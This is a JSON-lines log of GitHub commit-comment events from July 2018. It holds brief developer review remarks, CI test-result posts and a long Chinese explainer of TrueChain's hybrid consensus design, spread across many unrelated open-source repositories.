{"id":"7987006602","type":"CommitCommentEvent","actor":{"login":"onknows"},"repo":{"name":"onknows/openshift-ansible"},"payload":{"comment":{"id":29759419,"position":12,"line":12,"path":"inventory/zgw","commit_id":"533114d272e65e6454a83169e4f7302a6036a8df","created_at":"2018-07-19T05:52:20Z","updated_at":"2018-07-19T05:52:20Z","author_association":"OWNER","body":"node-labels niet meer nodig in 3.10"}},"created_at":"2018-07-19T05:52:20Z"}
{"id":"7987008199","type":"CommitCommentEvent","actor":{"login":"asad451"},"repo":{"name":"asad451/PMS"},"payload":{"comment":{"id":29759422,"position":1,"line":1,"path":"test/controllers/home_controller_test.rb","commit_id":"d44dcedc2ec02178a33fab5bff033fcd05156844","created_at":"2018-07-19T05:52:54Z","updated_at":"2018-07-19T05:52:54Z","author_association":"OWNER","body":"OK"}},"created_at":"2018-07-19T05:52:54Z"}
{"id":"7987009732","type":"CommitCommentEvent","actor":{"login":"onknows"},"repo":{"name":"onknows/openshift-ansible"},"payload":{"comment":{"id":29759426,"position":6,"line":6,"path":"inventory/zgw","commit_id":"533114d272e65e6454a83169e4f7302a6036a8df","created_at":"2018-07-19T05:53:28Z","updated_at":"2018-07-19T05:53:28Z","author_association":"OWNER","body":"openshift_node_group_name en openshift_schedulable hier niet nodig? In nodes groep is voldoende?"}},"created_at":"2018-07-19T05:53:28Z"}
{"id":"7987014089","type":"CommitCommentEvent","actor":{"login":"kelunik"},"repo":{"name":"amphp/byte-stream"},"payload":{"comment":{"id":29759433,"position":111,"line":209,"path":"lib/ResourceOutputStream.php","commit_id":"019cd6d27310417e6241d33962865f8fdb49d83c","created_at":"2018-07-19T05:55:04Z","updated_at":"2018-07-19T05:55:04Z","author_association":"MEMBER","body":"Yes, I know. But I couldn't when I wrote that code, because it didn't exist yet. :-) "}},"created_at":"2018-07-19T05:55:04Z"}
{"id":"7987014303","type":"CommitCommentEvent","actor":{"login":"rigelk"},"repo":{"name":"YunoHost-Apps/peertube_ynh"},"payload":{"comment":{"id":29759434,"position":null,"line":null,"path":null,"commit_id":"1d63c3fea98aee0d5e61b28fc7db9af14d073e3b","created_at":"2018-07-19T05:55:09Z","updated_at":"2018-07-19T05:55:09Z","author_association":"MEMBER","body":"Well you're switching from a release that is shipped with a precompiled 'dist' to a source install where you need an extra build step."}},"created_at":"2018-07-19T05:55:09Z"}
{"id":"7987017510","type":"CommitCommentEvent","actor":{"login":"NashvillePublicLibrary"},"repo":{"name":"MarmotLibraryNetwork/Pika"},"payload":{"comment":{"id":29759438,"position":null,"line":null,"path":null,"commit_id":"705c5b24507277471ede901818b476e357cc504f","created_at":"2018-07-19T05:56:11Z","updated_at":"2018-07-19T05:56:11Z","author_association":"COLLABORATOR","body":"https://marmot.myjetbrains.com/youtrack/issue/IN-1462"}},"created_at":"2018-07-19T05:56:11Z"}
{"id":"7987029635","type":"CommitCommentEvent","actor":{"login":"asimrp"},"repo":{"name":"asimrp/postgres"},"payload":{"comment":{"id":29759472,"position":5,"line":1090,"path":"src/backend/utils/misc/guc.c","commit_id":"b441bafaab107e01474807af5da09c1da0eb1253","created_at":"2018-07-19T06:00:22Z","updated_at":"2018-07-19T06:00:22Z","author_association":"OWNER","body":"Makes sense.  I was wondering about the overhead as well.  Zero overhead when off is the best policy.  Let me make that change."}},"created_at":"2018-07-19T06:00:22Z"}
{"id":"7987031198","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759479,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T06:00:53Z","updated_at":"2018-07-19T06:00:53Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2310 of 2310 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.22%25-green.png)</a>\n"}},"created_at":"2018-07-19T06:00:53Z"}
{"id":"7987035633","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29759495,"position":null,"line":null,"path":null,"commit_id":"3049276ae76d350b62a841abc11d20e053c2db67","created_at":"2018-07-19T06:02:23Z","updated_at":"2018-07-19T06:02:23Z","author_association":"NONE","body":"Follow-up-to-#6393-SZVAV-for-PTUnit (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3049276ae76d350b62a841abc11d20e053c2db67-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T06:02:23Z"}
{"id":"7987041104","type":"CommitCommentEvent","actor":{"login":"WaleedSoni"},"repo":{"name":"fahid-sami/ITShop-FE"},"payload":{"comment":{"id":29759503,"position":null,"line":null,"path":null,"commit_id":"ca27e9d0addb88da7cec178afec4f6dbb5d50697","created_at":"2018-07-19T06:04:16Z","updated_at":"2018-07-19T06:04:16Z","author_association":"NONE","body":"Well Done \r\nBest of Luck :) 👍 💯 👍 "}},"created_at":"2018-07-19T06:04:16Z"}
{"id":"7987041166","type":"CommitCommentEvent","actor":{"login":"ngdelcastillo"},"repo":{"name":"slashdotdash/conduit"},"payload":{"comment":{"id":29759504,"position":null,"line":null,"path":null,"commit_id":"7b385fc73a8349b9558dd2ccb82ecd7c3b73473f","created_at":"2018-07-19T06:04:17Z","updated_at":"2018-07-19T06:04:17Z","author_association":"NONE","body":"There's an error in the `reset_eventstore` when running test. I have added this part from your working code:\r\n\r\n```\r\n    {:ok, conn} =\r\n      EventStore.configuration()\r\n      |> EventStore.Config.parse()\r\n      |> EventStore.Config.default_postgrex_opts() # the missing part\r\n      |> Postgrex.start_link()\r\n```\r\nThis might help others who are also following your book. Great book btw. :+1: "}},"created_at":"2018-07-19T06:04:17Z"}
{"id":"7987049149","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29759515,"position":null,"line":null,"path":null,"commit_id":"55777e3ff6b0484fcd23659b0a29262bd0e87d44","created_at":"2018-07-19T06:07:03Z","updated_at":"2018-07-19T06:07:03Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - Win64-Windows-7-VisualStudio-14: OK (2946 of 2948 tests passed, 12 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 2 tests had: Table big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 621\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-55777e3ff6b0484fcd23659b0a29262bd0e87d44-PR6846-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.93%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T06:07:03Z"}
{"id":"7987057611","type":"CommitCommentEvent","actor":{"login":"vvdanila"},"repo":{"name":"ivolo/disposable-email-domains"},"payload":{"comment":{"id":29759542,"position":null,"line":null,"path":null,"commit_id":"19ac1552f0dbd65a75816cbe7e8e3c93f9be8a29","created_at":"2018-07-19T06:09:50Z","updated_at":"2018-07-19T06:09:50Z","author_association":"NONE","body":"@joanliu I think you added \"lron0re.com\" with a lowercase L instead of \"lron0re.com\" that is written with an \"i\" from the picture you posted. From what I see lowercase L (l) is very similar to uppercase i (I) on GitHub so we should be careful. "}},"created_at":"2018-07-19T06:09:50Z"}
{"id":"7987061575","type":"CommitCommentEvent","actor":{"login":"LeafHacker"},"repo":{"name":"ImpactDevelopment/ImpactBot"},"payload":{"comment":{"id":29759549,"position":null,"line":null,"path":null,"commit_id":"f09ec68da733073f0c604691102bcce9bc71a2d0","created_at":"2018-07-19T06:11:07Z","updated_at":"2018-07-19T06:11:07Z","author_association":"CONTRIBUTOR","body":"Was following the [discord.js docs](https://discord.js.org/#/docs/main/stable/class/Message?scrollTo=isMentioned) which I thought klassa was based on?"}},"created_at":"2018-07-19T06:11:07Z"}
{"id":"7987061616","type":"CommitCommentEvent","actor":{"login":"vvdanila"},"repo":{"name":"ivolo/disposable-email-domains"},"payload":{"comment":{"id":29759550,"position":null,"line":null,"path":null,"commit_id":"19ac1552f0dbd65a75816cbe7e8e3c93f9be8a29","created_at":"2018-07-19T06:11:07Z","updated_at":"2018-07-19T06:11:07Z","author_association":"NONE","body":"@joanliu also I think we should double check the zero (0) and o (O) letter. I think it's IronOre with an O not a 0. "}},"created_at":"2018-07-19T06:11:07Z"}
{"id":"7987065887","type":"CommitCommentEvent","actor":{"login":"molisehao"},"repo":{"name":"rubykube/peatio"},"payload":{"comment":{"id":29759555,"position":null,"line":null,"path":null,"commit_id":"c216fcb798f19e33516f1c2b926bbfd60f78c010","created_at":"2018-07-19T06:12:27Z","updated_at":"2018-07-19T06:12:27Z","author_association":"NONE","body":"Ask how this page should be modified\r\n\r\n"}},"created_at":"2018-07-19T06:12:27Z"}
{"id":"7987067612","type":"CommitCommentEvent","actor":{"login":"stinkyMonkeyy"},"repo":{"name":"truechain/wiki"},"payload":{"comment":{"id":29759559,"position":null,"line":null,"path":null,"commit_id":"f5520a83127222908e7619344d5859ccbd9793f7","created_at":"2018-07-19T06:13:01Z","updated_at":"2018-07-19T06:13:01Z","author_association":"CONTRIBUTOR","body":"# True黄皮书让我来解读\r\n\r\n## 对初链的认识：\r\n     初链（TRUEChina）是一种通用型公链，同时也是一种给商业应用提供基础设施的底层公链，其愿景是打造承载未来商用去中心化的应用，是全球最早实现PBFT-POW混合共识机制设计的公链之一。解决了公有链领域去中心化和性能之间的矛盾。TrueChain初链是以Permissionless PBFT为基础的公链，它拥有去中心化的社区共建组织架构，是一个面向各高性能行业应用，提供高效发布智能合约、监控全生命周期的管理工具，主要服务广告、版权、人力资源、征信、AI、游戏等行业。\r\n![42920113-c59eba10-8b47-11e8-98ab-994201fd3a6e](https://user-images.githubusercontent.com/32947900/42924449-c8ac587e-8b5c-11e8-988a-83d428d2e6d6.jpg)\r\n白皮书-ADTrue初链运作模式图\r\nADTrue是TrueChain初链的第一个应用，是为全球数字广告行业打造的底层区块链公链。通过汇聚全球数字广告资源和经验，实现数据互通、诚信交易、透明交易和效率提升。在此之后，TrueChain初链会陆续覆盖征信、AI、游戏等各行业，最终形成一个多行业跨链的区块链体系。\r\n## ADTrue解决什么问题？\r\n![42920217-25c778a0-8b48-11e8-8622-8920f9290ab2](https://user-images.githubusercontent.com/32947900/42924462-e6b9d990-8b5c-11e8-9469-4bc14422b826.jpg)\r\nADTrue应用实例，总结一下，核心上，ADTrue解决三个产业级的问题，连接、共享、诚信。\r\n\r\n问题1：连接\r\n\r\n现状：数据的连接，取决于BAT等垄断巨头是否开放及数据之间的技术打通标准\r\n\r\n未来：基于公链与共识机制，连接并打通全球所有数字广告应用\r\n\r\n问题2：共享\r\n\r\n现状：完全取决于垄断巨头的意愿\r\n\r\n未来：公链自身天然的共享特质\r\n\r\n问题3：诚信\r\n\r\n现状：第三方监测公司提供诚信报告\r\n\r\n未来：区块链自身天然的数据不可篡改特性与节点验证\r\n\r\n## 混合共识的优势\r\n     混合共识一定意义上来说满足了节点数目的可扩展性，可以在BFT参与者中敌手数目低于阈值且网络环境稳定的时候保持高性能的交易处理能力。混合共识的安全假设清晰明确。相比较一些基于无环有向图的设计，混合共识对于分布式应用的支持比较友好\r\n\r\n## 技术架构：\r\n初链的技术架构由下而上分为三层：混合共识机制、智能合约、合约抽象\r\n\r\n- PBFT-POW混合共识机制\r\n通俗易懂来讲，就是用PFBT来快速更新账本；用PoW来验证交易，辅助PBFT的成员变动，保留 PBFT 记录账本的机制不动，将超级节点的选取开放给公链，利用 POW 协议作为准系统支持超级节点的动态选取和协议达成，将主干节点社区的组建由私有链与联盟链性质转换为公有链性质。PBFT协议保证价值流通和商业应用所需要的性能，而POW协议保证去中心化。\r\n- 智能合约\r\n智能合约的运行必须依靠虚拟机完成，保证统一智能合约在不同环境下可以运算得到同一结果。初链继承了以太坊的虚拟机（EVM）的设计思路，在 PBFT 上推出 TVM。TVM 将植入每一个进行决策的主干结点，使得它们能根据单个需求进行调用请求。但TVM的构想还并不是很成熟,需要确定TVM的过渡状态、智能合约部署策略及从私链虚拟机向公链虚拟机的转变。同时还要确定从POW节点向PBFT节点转变的参数。\r\n- 合约抽象\r\n合约抽象层将抽象智能合约中的基本商业逻辑，简化开发者设置复杂智能合约的流程。\r\n## 节点选取\r\n从私有链与联盟链到公有链是一个质的转变。现在BFT社区节点选取多采用固定时间段更换一次,更换为新挖矿的P个节点(P为社区节点数目)。但这是反直觉的。如果之前的节点社区表现优异,为什么要强制撤换呢?而如果只因这些节点表现优异就不撤换的话,新节点就难以加入社区。所以需要在其间进行取舍,即每隔一段时间(K天)更换一次节点,而更换频率较低。在这里初链借鉴了Thunderella的想法,即慢链(POW链)可以用于证明BFT超级节点潜在的造假或出错情况。一旦这种情况发生,次日即可进行强制更换节点,而不必等到固定时点。更为关键的是选举机制的设定。一般混合机制是从最近挖矿的矿工节点中选取,但初链采用的是权益证明和随机选取相结合的方式。具体地说,全节点可以临时性冻结它们的代币资产,一定比例的超级节点将分配给全节点中权益证明较高的一些节点;另外部分的节点按照VRF随机过程选取,随机过程的种子由上一次选举的种子和节点社区容量决定。不同于Algorand,初链在此阶段将不会计算权益比例。随机过程选取的节点可以假定是完全不认识的,因此不可信。对于此种潜在情况,初链的策略是估算不可靠节点的比例,让该比例的不可靠节点不会影响正常决策。诚然,掌握巨大运算资源的一方可能操纵VRF随机过程,但这已不在此讨论范围内。\r\n# # 时间戳与自然时间限制\r\n传统共识机制默认地给予了矿工、节点社区成员和领导者一定的时间窗口,导致在要求严格时间顺序的商业互换等智能合约中,可能存在恶意节点调换合约顺序、插入自身合约等不正当牟利手段。当吞吐量较高时,这种不当激励将被继续放大。更糟糕的是,这种恶意调换由于存在天然网络延迟导致顺序调换的可能而难以被察觉,除非这种调换被接受者自己所发现并掌握最终延迟的证据。为支持这种去中心化的商业互换,初链引入了粘性时间戳作为额外限制。这个时间戳是一个启发式的参数,会随时间进程而改变。当一笔交易等待验证时,用户把自己的物理时间戳作为交易元数据与交易打包上传。BFT链的验证器会随后根据以下算法检验该笔交易是否有效地被记录过或有意忽视过。如果出现被忽视、误记或延迟记录,则报告问题,即说明之前节点的记录是有问题的。\r\n(1)检验验证器当前时间与物理时间戳的差值是否小于粘性时间戳。如果大于,则说明该笔交易上传到验证器的时间与其真实发出的时间相差过大,可以判定之前节点出现了忽视、延误或有意偏向等问题。\r\n\r\n(2)检验交易是否被记录过。如果被记录过,则继续检验当前链的最后一笔交易的时间戳是否早于新上传的交易。如果出现链上最后一笔交易的时间戳晚于新上传交易,可以判定之前节点的记录出现了错误、延误或造假的可能。\r\n\r\n(3)如果未被记录过或时间戳未出现顺序颠倒,则把这笔新的记录添加到账本中。通过以上方法,可以有效保证双重支付、不处理交易等BFT恶意节点的行为。\r\n\r\n在这一阶段BFT记录账本时,领导者可以根据物理时间戳选择一批交易拆开。不过这一步并不是必须的,因为我们可以在之后的评估和证实过程中强制保证顺序。\r\n\r\n这一改动有如下好处:\r\n\r\n(1)交易顺序完全按照物理时间戳排列,因此可以避免同一节点恶意调换交易顺序的情况;\r\n\r\n(2)一批交易的顺序由BFT社区按时间戳先后排列;\r\n\r\n(3)由于时间窗口的限制,节点不能伪造虚假物理时间戳。\r\n\r\n不过这种改动也具有明显的缺点。一旦根据网络延迟情况选取的粘性时间戳选取不合适,所有交易处理会直接被中断。而且BFT社区节点仍可以通过虚报时间和拒绝特定交易造假。尽管BFT社区节点无论怎样都能拒绝交易,但是假如一个节点是诚实的,有时也可能由于时间的不同步性拒绝一部分交易,所以无法区分。然而这一问题可以通过在选取BFT社区节点时增加对该节点必须拥有同步性时钟的限制而加以解决。\r\n\r\n## 初链虚拟机(TVM)\r\n在这一领域的范例是以太坊虚拟机(EVM)。它尝试跟随决定主义,在简化激励计算步骤上做出了优化。它还支持内存的非堆栈存储、合约授权以及调用间的价值存储。而初链将继续将EVM应用于慢链之上,并在PBFT主干节点中应用TVM,以使得每个全节点能够响应不同调用请求。但TVM的构想还并不是很成熟,需要确定TVM的过渡状态、智能合约部署策略及从私链虚拟机向公链虚拟机的转变。同时还要确定从POW节点向PBFT节点转变的参数。\r\n##关于PBFT共识机制\r\n![42920590-16b290c8-8b4a-11e8-9a41-44e54b75ac01](https://user-images.githubusercontent.com/32947900/42924610-92d43446-8b5d-11e8-81f4-e895151d78f8.jpeg)\r\n我的理解和EOS超级节点差不多，只是节点比EOS多，广播方式不同，从而PBFT在安全性上高一些。\r\n\r\n具体步骤如下：\r\n\r\n其中C为发送请求端，0123为服务端，3为宕机的服务端\r\n\r\nRequest：请求端C发送请求到任意一节点，这里是0\r\n\r\nPre-Prepare：服务端0收到C的请求后进行广播，扩散至123\r\n\r\nPrepare：123,收到后记录并再次广播，1->023，2->013，3因为宕机无法广播\r\n\r\nCommit：0123节点在Prepare阶段，若收到超过一定数量的相同请求，则进入Commit阶段，广播Commit请求\r\n\r\n5.Reply：0123节点在Commit阶段，若收到超过一定数量的相同请求，则对C进行反馈\r\n\r\n由此可以看出，拜占庭容错能够容纳将近1/3的错误节点误差，也就是EOS的21个节点，7个可以用就可以。\r\n\r\n不知道理解的对不对！\r\n\r\n## 奖励机制:\r\n初链的混合共识机制运用公平的、随机抽取的、轮换的社区制度天然地避免了持币者拥有持续性地获得大量奖励,从而保证了财富的公平分配。为补偿计算算力的不均匀性,初链设置了从BFT与POW池获得奖励的奖励机制。在工程设计上,利用标识改变工作分配,让BFT交易、POW、激励池依次获得资源分配的优先级。通过这种方式,如果BFT节点由于K天数限制(最多每K天必须更换一次节点)被清出网络,它仍可以通过为网络其余部分提供补偿机制享受到投资硬件产生的收益。所有的节点都能完成POW和PBFT的任务,但是PBFT获得更高的优先级。\r\n\r\n## 初链未来的优化方向：\r\n\r\n- 改进所有节点的时间戳同步，而不需要中心化的NTP服务器。\r\n- 喜欢奖励基础设施里的激励技术，这样重度投资基础设施的投资人不会遭遇“被忽视”，“亏本”的问题。\r\n- 支持副本创建的分片技术，尽量减少被BFT会员会拒绝的交易集。\r\n- 添加零知识证明以增强隐私。\r\n- EVM、TVM和Linux容器技术的混合基础设施。\r\n- 改进虚拟机规范中的二进制数据编码方法，交易签名，收费表等章节。\r\n\r\n## 总结：\r\n初链的共识设计具有同样的一致性、活跃度、交易终结性和安全保障，这是与混合共识事实上的一致。讨论了轮值委员会成员的频率和物理时间戳限制等优化问题。 提出了在以太坊之上建立一个新的虚拟机的想法，它在无权限的设置中增加了基于许可链的交易处理功能。还使用数据共享和投机交易的思想，评估混合云基础设施中智能合约的运行情况，使用现有的志愿计算协议来实现引入的补偿基础结构。\r\n\r\n以上为本人对于初链黄皮书的理解。"}},"created_at":"2018-07-19T06:13:01Z"}
{"id":"7987068411","type":"CommitCommentEvent","actor":{"login":"738654805"},"repo":{"name":"anibali/eval-mpii-pose"},"payload":{"comment":{"id":29759560,"position":null,"line":null,"path":null,"commit_id":"2ae99137b02b2d1b3d221e8a042ecfc5206b424b","created_at":"2018-07-19T06:13:16Z","updated_at":"2018-07-19T06:13:16Z","author_association":"NONE","body":"nice job."}},"created_at":"2018-07-19T06:13:16Z"}
{"id":"7987075112","type":"CommitCommentEvent","actor":{"login":"haikaladnan"},"repo":{"name":"graphql/libgraphqlparser"},"payload":{"comment":{"id":29759576,"position":null,"line":null,"path":null,"commit_id":"f42c7bc6564e66253348058e8c66696d3b6e9dd7","created_at":"2018-07-19T06:15:20Z","updated_at":"2018-07-19T06:15:20Z","author_association":"NONE","body":"Add python3 support for building the lib. #66\r\ngraphql:master dailymotion:abu/support_python3_for_build"}},"created_at":"2018-07-19T06:15:20Z"}
{"id":"7987079291","type":"CommitCommentEvent","actor":{"login":"stinkyMonkeyy"},"repo":{"name":"truechain/wiki"},"payload":{"comment":{"id":29759582,"position":1,"line":1,"path":"task_list/task_20180705/readme.md","commit_id":"f5520a83127222908e7619344d5859ccbd9793f7","created_at":"2018-07-19T06:16:41Z","updated_at":"2018-07-19T06:16:41Z","author_association":"CONTRIBUTOR","body":"# True黄皮书让我来解读"}},"created_at":"2018-07-19T06:16:41Z"}
{"id":"7987080599","type":"CommitCommentEvent","actor":{"login":"vardhan1987"},"repo":{"name":"Evolvus/infrastructure-test-doc"},"payload":{"comment":{"id":29759584,"position":null,"line":null,"path":null,"commit_id":"338479a66a6cc251b00668b6b99451fcc2e62e78","created_at":"2018-07-19T06:17:06Z","updated_at":"2018-07-19T06:17:06Z","author_association":"CONTRIBUTOR","body":"Duplicate"}},"created_at":"2018-07-19T06:17:06Z"}
{"id":"7987082832","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29759588,"position":null,"line":null,"path":null,"commit_id":"fc03a66093bc157be3a8126b19850b12b5f83568","created_at":"2018-07-19T06:17:47Z","updated_at":"2018-07-19T06:17:47Z","author_association":"NONE","body":"Bravo Stefan! :-)"}},"created_at":"2018-07-19T06:17:47Z"}
{"id":"7987088112","type":"CommitCommentEvent","actor":{"login":"haikaladnan"},"repo":{"name":"graphql/libgraphqlparser"},"payload":{"comment":{"id":29759603,"position":null,"line":null,"path":null,"commit_id":"6a3693ffd6dcc1702742d23943cecb4686c7aa4c","created_at":"2018-07-19T06:19:16Z","updated_at":"2018-07-19T06:19:16Z","author_association":"NONE","body":"#66"}},"created_at":"2018-07-19T06:19:16Z"}
{"id":"7987092118","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29759607,"position":null,"line":null,"path":null,"commit_id":"d14916dec2642140d9381af01333a703c903ec02","created_at":"2018-07-19T06:20:13Z","updated_at":"2018-07-19T06:20:13Z","author_association":"MEMBER","body":"oops i think you asked if you want use \"--owner-less\" or not lol, if so then you decide\r\n\r\nanyway \"--ranked\" is definately no use in battle or soccer (because no ranking formula for them)\r\n"}},"created_at":"2018-07-19T06:20:13Z"}
{"id":"7987092378","type":"CommitCommentEvent","actor":{"login":"haikaladnan"},"repo":{"name":"graphql/libgraphqlparser"},"payload":{"comment":{"id":29759608,"position":9,"line":9,"path":"ast/c_visitor_impl_py3.py","commit_id":"6a3693ffd6dcc1702742d23943cecb4686c7aa4c","created_at":"2018-07-19T06:20:18Z","updated_at":"2018-07-19T06:20:18Z","author_association":"NONE","body":"#1"}},"created_at":"2018-07-19T06:20:18Z"}
{"id":"7987093534","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29759610,"position":1,"line":1,"path":"packages/sanity/src/ssr-renderer/server.tsx","commit_id":"159d290a1dca55d4c0d8d877cc08b304876d37c2","created_at":"2018-07-19T06:20:39Z","updated_at":"2018-07-19T06:20:39Z","author_association":"COLLABORATOR","body":"Why do we need `typescript-support`? Isn't this file supposed to be transpiled to JS?"}},"created_at":"2018-07-19T06:20:39Z"}
{"id":"7987094917","type":"CommitCommentEvent","actor":{"login":"NickWard"},"repo":{"name":"OpenHFT/Chronicle-Queue"},"payload":{"comment":{"id":29759614,"position":5,"line":1799,"path":"src/main/java/net/openhft/chronicle/queue/impl/single/SingleChronicleQueueExcerpts.java","commit_id":"c1251f338a52dc97691ee3216dc254bc530cfa98","created_at":"2018-07-19T06:21:04Z","updated_at":"2018-07-19T06:21:04Z","author_association":"CONTRIBUTOR","body":"I think this should be:\r\nif(context.isMetaData()){\r\n    continue;\r\n}\r\nif(!context.isPresent()){\r\n    toStart();\r\n    return this;\r\n}"}},"created_at":"2018-07-19T06:21:04Z"}
{"id":"7987095169","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29759615,"position":9,"line":9,"path":"packages/sanity/src/ssr-renderer/server.tsx","commit_id":"159d290a1dca55d4c0d8d877cc08b304876d37c2","created_at":"2018-07-19T06:21:09Z","updated_at":"2018-07-19T06:21:09Z","author_association":"COLLABORATOR","body":"We should instead use the pattern provided through the command line."}},"created_at":"2018-07-19T06:21:09Z"}
{"id":"7987097709","type":"CommitCommentEvent","actor":{"login":"alisey"},"repo":{"name":"wix-incubator/ui-autotools"},"payload":{"comment":{"id":29759620,"position":34,"line":34,"path":"packages/sanity/src/ssr-test/sanity-tests.tsx","commit_id":"159d290a1dca55d4c0d8d877cc08b304876d37c2","created_at":"2018-07-19T06:21:58Z","updated_at":"2018-07-19T06:21:58Z","author_association":"COLLABORATOR","body":"Do we still need an exclamation mark here? Casting to HTMLElement above should have made it unnecessary."}},"created_at":"2018-07-19T06:21:58Z"}
{"id":"7987099702","type":"CommitCommentEvent","actor":{"login":"wanghan0501"},"repo":{"name":"switchablenorms/Switchable-Normalization"},"payload":{"comment":{"id":29759622,"position":5,"line":60,"path":"models/resnet_v2_sn.py","commit_id":"746394de48d3ace034749ea97f9b31adb3f0a321","created_at":"2018-07-19T06:22:37Z","updated_at":"2018-07-19T06:22:37Z","author_association":"NONE","body":"why you change it? It can't work."}},"created_at":"2018-07-19T06:22:37Z"}
{"id":"7987124583","type":"CommitCommentEvent","actor":{"login":"nandubatchu"},"repo":{"name":"AuroraDAO/idex-api-docs"},"payload":{"comment":{"id":29759687,"position":null,"line":null,"path":null,"commit_id":"1601a247ae54b34ae80b65477aa741dc474a22cf","created_at":"2018-07-19T06:29:58Z","updated_at":"2018-07-19T06:29:58Z","author_association":"NONE","body":"Are the upcoming modifications in v2 applicable only to the websockets API or other HTTP endpoints also."}},"created_at":"2018-07-19T06:29:58Z"}
{"id":"7987127123","type":"CommitCommentEvent","actor":{"login":"russfiedler"},"repo":{"name":"OceansAus/cice5"},"payload":{"comment":{"id":29759695,"position":null,"line":null,"path":null,"commit_id":"8e87f0a6e9879bacd09e4dfc33b1ce860bea88e3","created_at":"2018-07-19T06:30:39Z","updated_at":"2018-07-19T06:30:39Z","author_association":"NONE","body":"@nicjhan  Shouldn't the last dimension of all those arrays be `distrb_info%numLocalBlocks`? i.e. The actual number of blocks created on the PE rather than the maximum allowable. It should be available unless the special case of Cartesian tiling is stuffed up. Comments suggest it might be."}},"created_at":"2018-07-19T06:30:39Z"}
{"id":"7987130255","type":"CommitCommentEvent","actor":{"login":"JerryShea"},"repo":{"name":"OpenHFT/Chronicle-Queue"},"payload":{"comment":{"id":29759708,"position":5,"line":1799,"path":"src/main/java/net/openhft/chronicle/queue/impl/single/SingleChronicleQueueExcerpts.java","commit_id":"c1251f338a52dc97691ee3216dc254bc530cfa98","created_at":"2018-07-19T06:31:33Z","updated_at":"2018-07-19T06:31:33Z","author_association":"CONTRIBUTOR","body":"Sure - no problem!\n\nOn 19 July 2018 at 16:28, Nicholas Ward <notifications@github.com> wrote:\n\n> Yeah, I understand that. Somehow, however, it is getting one. Obviously,\n> the important question is 'why?' but in order to make progress on the\n> project I don't see that adding the extra check is a burden. This is only\n> used on startup. I'm writing a test case to replicate their scenario and\n> I've asked them for the queue files when they see this.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenHFT/Chronicle-Queue/commit/c1251f338a52dc97691ee3216dc254bc530cfa98#commitcomment-29759678>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Abt3Hf3wvFXPr_PYhtEBSZbJfANu6cyRks5uICchgaJpZM4VV0Dx>\n> .\n>\n\n\n\n-- \nJerry Shea\n+61 409 145 895\nchronicle.software <http://www.chronicle.software/>\n<http://www.chronicle.software/>[image: Chronicle_logo_RGB_email_03 (003)]\ntrading as Chronicle Software Ltd\n"}},"created_at":"2018-07-19T06:31:33Z"}
